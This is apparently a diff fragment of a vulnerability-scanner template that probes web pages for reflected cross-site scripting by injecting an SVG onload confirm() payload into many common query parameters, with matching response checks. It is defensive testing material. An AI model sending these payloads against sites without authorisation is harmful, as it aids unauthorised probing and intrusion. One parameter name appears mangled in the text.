- "{{BaseURL}}/?email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass127%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action227%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down27%29%3E"
|
||||
- "{{BaseURL}}/?tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix27%29%3E&redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name27%29%3E&deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted27%29%3E"
|
||||
- "{{BaseURL}}/?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory27%29%3E&tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test27%29%3E"
|
||||
- "{{BaseURL}}/?first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status27%29%3E"
|
||||
- "{{BaseURL}}/?f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f27%29%3E&ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del27%29%3E&activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history27%29%3E"
|
||||
- "{{BaseURL}}/?passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination27%29%3E"
|
||||
- "{{BaseURL}}/?sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st27%29%3E&title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title27%29%3E"
|
||||
- "{{BaseURL}}/?dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite27%29%3E"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 1
|
||||
|
|
@ -30,44 +56,7 @@ http:
|
|||
part: body
|
||||
condition: or
|
||||
words:
|
||||
- "'>\"<svg/onload=confirm('q')>"
|
||||
- "'>\"<svg/onload=confirm('s')>"
|
||||
- "'>\"<svg/onload=confirm('search')>"
|
||||
- "'>\"<svg/onload=confirm('id')>"
|
||||
- "'>\"<svg/onload=confirm('action')>"
|
||||
- "'>\"<svg/onload=confirm('keyword')>"
|
||||
- "'>\"<svg/onload=confirm('query')>"
|
||||
- "'>\"<svg/onload=confirm('page')>"
|
||||
- "'>\"<svg/onload=confirm('keywords')>"
|
||||
- "'>\"<svg/onload=confirm('url')>"
|
||||
- "'>\"<svg/onload=confirm('view')>"
|
||||
- "'>\"<svg/onload=confirm('cat')>"
|
||||
- "'>\"<svg/onload=confirm('name')>"
|
||||
- "'>\"<svg/onload=confirm('key')>"
|
||||
- "'>\"<svg/onload=confirm('p')>"
|
||||
- "'>\"<svg/onload=confirm('month')>"
|
||||
- "'>\"<svg/onload=confirm('page_id')>"
|
||||
- "'>\"<svg/onload=confirm('password')>"
|
||||
- "'>\"<svg/onload=confirm('terms')>"
|
||||
- "'>\"<svg/onload=confirm('token')>"
|
||||
- "'>\"<svg/onload=confirm('type')>"
|
||||
- "'>\"<svg/onload=confirm('unsubscribe_token')>"
|
||||
- "'>\"<svg/onload=confirm('api')>"
|
||||
- "'>\"<svg/onload=confirm('api_key')>"
|
||||
- "'>\"<svg/onload=confirm('begindate')>"
|
||||
- "'>\"<svg/onload=confirm('callback')>"
|
||||
- "'>\"<svg/onload=confirm('categoryid')>"
|
||||
- "'>\"<svg/onload=confirm('csrf_token')>"
|
||||
- "'>\"<svg/onload=confirm('email')>"
|
||||
- "'>\"<svg/onload=confirm('emailto')>"
|
||||
- "'>\"<svg/onload=confirm('enddate')>"
|
||||
- "'>\"<svg/onload=confirm('immagine')>"
|
||||
- "'>\"<svg/onload=confirm('item')>"
|
||||
- "'>\"<svg/onload=confirm('jsonp')>"
|
||||
- "'>\"<svg/onload=confirm('l')>"
|
||||
- "'>\"<svg/onload=confirm('lang')>"
|
||||
- "'>\"<svg/onload=confirm('list_type')>"
|
||||
- "'>\"<svg/onload=confirm('year')>"
|
||||
- "'>\"<svg/onload=confirm('xss-"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
|||
Loading…
Reference in New Issue